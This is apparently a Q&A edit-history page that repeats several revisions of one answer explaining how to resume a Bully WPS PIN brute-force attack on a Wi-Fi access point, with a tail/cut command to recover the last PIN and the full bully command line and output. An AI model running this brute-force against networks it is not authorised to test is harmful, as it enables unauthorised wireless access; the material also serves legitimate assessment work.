Skip to main content
Fixed failure in code formatting.
Source Link

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"): $ tail /root/.bully/112233445566.run

$ tail /root/.bully/112233445566.run
# session ended 2014-04-27 03:08:48 with signal 2
63370002:63370002:1::

You can extract it directly by using cut:

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"): $ tail /root/.bully/112233445566.run

# session ended 2014-04-27 03:08:48 with signal 2
63370002:63370002:1::

You can extract it directly by using cut:

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"):

$ tail /root/.bully/112233445566.run
# session ended 2014-04-27 03:08:48 with signal 2
63370002:63370002:1::

You can extract it directly by using cut:

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Enhanced last line example.
Source Link

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"): $ tail /root/.bully/112233445566.run

# session ended 2014-04-27 03:08:48 with signal 2
63370002:63370002:1::

You can extract it directly by using cut:

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"):

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"): $ tail /root/.bully/112233445566.run

# session ended 2014-04-27 03:08:48 with signal 2
63370002:63370002:1::

You can extract it directly by using cut:

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Minor semantic enhancement.
Source Link

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"):

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Locate the last PIN tested from the storage file (the first number in the last line until the ":"):

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"):

$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002

And continue from there:

$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc'   Next pin '63370002'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370003'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '63370004'

I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.

Mistake in file name.
Source Link
Loading
Source Link
Loading